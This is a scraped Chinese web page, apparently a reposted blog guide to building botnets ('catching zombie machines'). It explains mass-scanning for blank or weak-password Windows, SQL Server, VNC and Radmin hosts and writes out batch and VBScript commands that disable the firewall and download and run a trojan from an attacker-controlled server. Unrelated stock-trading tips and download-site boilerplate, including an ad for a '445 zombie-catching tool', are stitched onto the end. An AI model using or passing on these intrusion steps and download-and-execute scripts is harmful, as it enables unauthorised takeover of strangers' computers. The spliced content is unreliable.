2212人阅读
【黑客】常抓肉鸡的几种方法初学必备
1、3389抓鸡
现在国内网络上流传着一种克隆版的XP，安装后会默认开启一个账号为new,密码为空的账户，而且基本上都是开着3389的，我们就可以利用这一点来抓肉鸡。首先用端口扫描工具扫一段IP的3389端口，扫完后就直接用远程桌面连接开放3389的机器（也可以把结果保存为文本文件，用批量生成3389连接的工具来连接），然后输入账号new登入，如果别人的电脑前没人的话你就可以去你的空间下载你传好的木马安装拉~~
这种方法只针XP系统，如果遇到2000或者2003系统就不要试了
呵呵。缺点也很明显，如果别人不是用new账号登入XP的，你再登入上去就会把他挤出去（XP只支持单用户登入，用户登入需要用工具开），或者电脑前有人你就不可能去打开IE下载木马了。
135端口抓肉鸡
首先先用端口扫描器扫一段IP的135端口，然后把结果保存，再用NTSCAN过滤有弱口令的机器，最后用recton开telnet传马。因为现在135和445端口都被防火墙屏蔽了，只能扫本地的135肉鸡，要抓外地的只能用外地的135肉鸡来扫。
扫445端口抓肉鸡
和扫135抓肉鸡差不多，首先先用端口扫描器扫一段IP的445端口，然后把结果保存，再用NTSCAN过滤有弱口令的机器，最后用啊D工具包开共享传马。因为现在135和445端口都被防火墙屏蔽了，只能扫本地的445肉鸡，要抓外地的只能用外地的445肉鸡来扫
1433端口溢出
这个方法可以实现全自动抓鸡，不过现在太多人搞，成功率已经不高了。要用到的工具：S扫sqlhello.exenc.exe批处理文件首先先写个批处理，打开记事本，把以下代码复制修改后，储存为扫描+溢出.bat文件
for/f&eol=;tokens=1,2delims=&%%iin(tt.txt)dos.exetcp%%i%%j
for/f&eol=;tokens=1delims=&%%iin(Result.txt)dosqlhello%%i
1433xxx.xxx.xx.xx556
还要新建一个tt.txt，里面你要扫的IP段，格式为
XXX.XXX.XXX.XXXXXX.XXX.XXX.XXX,中间是空格
1433是要扫描的端口，1000是扫描线程数，dosqlhello%%i
1433xxx.xxx.xx.xx556这个里的XXX添你的IP，556是后面NC监
听的端口然后再写个批处理
Nc-l-vv-p556&daima.txt
echousername&&daima.txt
echopassword&&daima.txt
echobin&&daima.txt(以2进制传输数据)
echogetxxx.exe(你的木马的文件名,要放在根目录下)&&daima.txt
echobye&&daima.txt
netstopsharedaccess(关闭WINDOWS自带防火墙)
ftp-s:daima.txt
xxx.exe(也是填你木马的文件名)
deldaima.txt
注意上面的代码回车符别删掉，要不然就没法下你的马了。
几种肉鸡上传文件的方法
先在自己某机器上建个tftp服务器,如执行tftpd32.exe，
再将文件（sample.exe)上传到别的机器中(肉鸡），
肉鸡cmd中执行：tftp-i服务器ipgetsample.exe
肉鸡cmd中执行：
echoopenftp服务器ip[端口]&ftp.txt
echousername&&ftp.txt
echopassword&&ftp.txt
echogetsample.exe&&ftp.txt
echobye&&ftp.txt
ftp-s:ftp.txt
delftp.txt
利用wineggdrop的wget.exe
肉鸡cmd中执行：wget网站/sample.exe
利用dl.vbe法
肉鸡cmd中执行：
echowithwscript:if.arguments.count^&2then.quit:endif
echosetaso=.createobject(&adodb.stream&):set
web=createobject(&microsoft.xmlhttp&)&&dl.vbe
echoweb.open&get&,.arguments(0),0:web.send:if
web.status^&200thenquit&&dl.vbe
aso.type=1:aso.open:aso.writeweb.responsebody:aso.savetofile
.arguments(1),2:endwith&dl.vbe
cscriptdl.vbehttp://*。*。*。*:88/sample.exesample.exe
利用iget.vbe法
肉鸡cmd中执行：
echoiLocal=LCase(WScript.Arguments(1))&iget.vbe
echoiRemote=LCase(WScript.Arguments(0))&&iget.vbe
echoSetxPost=CreateObject(&Microsoft.XMLHTTP&)
&&iget.vbe
echoxPost.Open&GET&,iRemote,0&&iget.vbe
echoxPost.Send()&&iget.vbe
echoSetsGet=CreateObject(&ADODB.Stream&)&&iget.vbe
echosGet.Mode=3&&iget.vbe
echosGet.Type=1&&iget.vbe
echosGet.Open()&&iget.vbe
echosGet.Write(xPost.responseBody)&&iget.vbe
echosGet.SaveToFileiLocal,2&&iget.vbe
cscriptiget.vbehttp://*。*。*。*/sample.exesample.exe
利用Http网站vbe法
echoSetxPost=CreateObject(&Microsoft.XMLHTTP&)
echoxPost.Open&GET&,&http://*.*.*.*/sample.exe&,0
echoxPost.Send()&&dsa.vbe
echoSetsGet=CreateObject(&ADODB.Stream&)&&dsa.vbe
echosGet.Mode=3&&dsa.vbe
echosGet.Type=1&&dsa.vbe
echosGet.Open()&&dsa.vbe
echosGet.Write(xPost.responseBody)&&dsa.vbe
echosGet.SaveToFile&sample.exe&,2&&dsa.vbecscript
deldsa.vbe
可以开3389，然后登陆，进行本地的下载。该方法对服务
器上传很严格的机器特有效。（包括硬件防火墙）
先打开多个NC.bat,然后再打开扫描+溢出.bat,然后你就可以
去睡大觉了。自动扫描，扫描完后自动溢出，溢出后还自动下
马执行，爽吧！所以这里讲详细点，呵呵。还有4221端口也
可以这样溢出，只要用这些端口的溢出工具就好了
扫1433抓肉鸡之2
要用到的工具：端口扫描器X-scanSQL综合利用工具
上面我们说过了，1433溢出现在成功率已经不高了，所以我
们可以用另一种方法。开了1433端口的机器一般都装了SQL，
所以我们可以猜测SQL弱口令来抓1433肉鸡。
首先先用端口扫描器扫一段IP的1433端口，然后结果保存为
文本文件，接着用X-scan导入这些开了1433的IP，然后在扫描
参数-全局设置-扫描模块这一栏里只勾上SQL-SERVER就可以了
，其他不要勾。然后在插件设置-端口相关设置-待检测端口这
一栏，只填1433端口。然后就可以开始扫描了。扫描完成后会
有个报告，列出了有弱口令的机器，然后打开SQL综合利用工
具，输入你扫到的弱口令来连接，接着打开SQL综合利用工具-
利用目录，上传你的木马，然后在用DOS命令执行你的木马就
INNT扫SA弱口令
其实这个原理和上面一样，效率也没上面的高，只是想让大
家知道下，呵呵。
工具：WINNTAutoAttackSQL综合利用工具
打开WINNTAutoAttack，找一段IP添上，然后只勾上设置下
的仅对PING检查成功的机器进行检测和SQL列出密码为空的SA
账号，接着开始扫描，扫完后，用SQL综合利用工具连上传马
执行就好了。
扫5900端口抓VNC肉鸡
首先用VNC扫描器扫描一段IP，扫描格式为vscan.exe（扫描
器文件名）-i219.0.0.0-219.255.255.255（扫描IP段）-p5900-
vnc-vv扫描完成后会在扫描器所在的同一文件夹生成一个文
本文件，打开后有一列IP，IP后面的有一些单词比如
patched,banned,vulnerable,只有单词为vulnerable才能连接。接着
就用VNC连接器连接
扫4899空口令抓肉鸡
工具：端口扫描器4899探测器Radmin
首先先用端口扫描器扫一段IP的4899端口，然后用4899探测
器导入开了4899端口的IP，接着扫空令，最后用Radmin连接有
空口令的机器，带开文件管理，上传的你木马运行就OK了。
&&相关文章推荐
* 以上用户言论只代表其个人观点，不代表CSDN网站的观点或立场
访问：5967次
排名：千里之外
转载：11篇
(1)(2)(1)(2)(5)(3)您现在的位置：
实用成功率最高的短线方法
实用成功率最高的短线方法
　　一、时间：30分钟，把30分钟的移动平参数设定为：13、77、99
　　二、买入方法：
　　1：脚掌买小法：13线出现高低脚形态，以左脚低右脚高为有效图形，作右脚时最好无量，一小阴小阳方式运行在13线上，同时MACD的DIFF金叉DEA，此时少量介入，加仓买入点在放量阳线站在3均线上之上，MACD的红柱拉长之时。
　　2：速涨点：是指77，99走平上翘（短期上升趋势确立）股价稳站在77，99之上，再这作的短暂的调整，快拉升时的点叫速涨点。
　　3：靠线法：靠13线不是77，99。股价站在77，99后，股价突然上涨，13线没跟上离13线远了要靠一下线，股价离77，99一指的时候。
　　4：回踩下探法：股价回踩到77，99就可介入，前提是77，99走平上翘期间{介入最好是当MACD的绿柱一根比一根短时或红柱刚刚加长时。
　　心得：
　　我炒股是看一步走一步，象下相棋一样。发现买点我就全仓进，发现卖点我就跑，赚了5%&&10%就行了，两周任务完成了，在寻找下一个目标。我就是这麽炒股。
　　我炒股不太注意涨到何点，跌到何点，只注意我的20日均线是向上还是向下。
　　20日均线是短期魔力线，也叫万能线，当一只股票价格，今天大涨到4.50元时，20日均线假如是3.90元，连跌3天后，股价从4.50元到4.00元，这时我看20日均线价反而涨到3.98元，我就出手了（注：出手等于买入）。
　　我总是买跌不买涨。买阴线不买阳线，
　　但趋势哪怕它是短期趋势，我也买涨不买跌，买上升不买下降。
　　买涨不买跌，是指买趋势上涨，不买趋势下跌。
　　买阴不买阳，是指买趋势上涨中阴跌缩量时介入
　　要买20日均线天天涨的票，而股价连跌2至3天缩量时买入。
　　所以一定要把波和段的意义了解清楚，分析理解明白才行
　　我炒股就看一个指标MACD，口味不同，各有所好，自己把握。
（南方财富网）
南方财富网声明：资讯来源于合作媒体及机构，属作者个人观点，仅供投资者参考，并不构成投资建议。投资者据此操作，风险自担。
&K线图学习
48小时排行抓鸡方法思路心得_百度文库
两大类热门资源免费畅读
续费一年阅读会员，立省24元！
抓鸡方法思路心得
你可能喜欢&445端口抓鸡工具超强版--成功率高抓鸡多
秒后自动跳转到登录页
快捷登录：
举报类型：
不规范：上传重复资源
不规范：标题与实际内容不符
不规范：资源无法下载或使用
其他不规范行为
违规：资源涉及侵权
违规：含有危害国家安全等内容
违规：含有反动/色情等内容
违规：广告内容
详细原因：
任何违反下载中心规定的资源，欢迎Down友监督举报，第一举报人可获5-10下载豆奖励。
视频课程推荐
445端口抓鸡工具超强版--成功率高抓鸡多
上传时间：
技术分类：
资源评价：
（8位用户参与评价）
已被下载&278&次
445端口抓鸡工具超强版--成功率高抓鸡多，使用前关闭杀毒软件，会报错，没有后门，请放心，本人测试过。
本资料共包含以下附件：
445端口抓鸡工具超强版--成功率高抓鸡多.rar
51CTO下载中心常见问题：
1.如何获得下载豆？
1)上传资料
2)评论资料
3)每天在首页签到领取
4)购买VIP会员服务，无需下载豆下载资源
5)更多途径：点击此处
2.如何删除自己的资料？
下载资料意味着您已同意遵守以下协议：
1.资料的所有权益归上传用户所有
2.未经权益所有人同意，不得将资料中的内容挪作商业或盈利用途
3.51CTO下载中心仅提供资料交流平台，并不对任何资料负责
4.本站资料中如有侵权或不适当内容，请邮件与我们联系（）
5.本站不保证资源的准确性、安全性和完整性, 同时也不承担用户因使用这些资料对自己和他人造成任何形式的伤害或损失
相关专题推荐
不论你是黑客发烧友，还是网络安全工
网络管理人员应认真分析各种可能的入
DDOS全名是Distributed Denial of se
本着学习和研究的精神，以知己知彼为
本视频专题包涵从了解互联网世界，服
本专题收集了渗透中常用的一些工具（
　　目前国内发行量最大的网络安全（
本专题为电脑报随书视频——《黑客入
本专题为黑鹰破解视频教程基础篇，掌
本专题为黑客入门常用dos命令视频教程
《黑客防线》PDF电子期刊全集，该有的
网络安全管理视频，阐述网络安全的基
TCP/IP协议详解，包括了链路层、ARP、
本专题为学习黑客技术朋友们提供的新
本专题为WEB安全-渗透测试安全培训视
本专题为华中红客基地的网站入侵视频
意见或建议：
联系方式：
您已提交成功！感谢您的宝贵意见，我们会尽快处理抓鸡方法_百度文库
两大类热门资源免费畅读
续费一年阅读会员，立省24元！
阅读已结束，下载文档到电脑
想免费下载更多文档？
定制HR最喜欢的简历
你可能喜欢}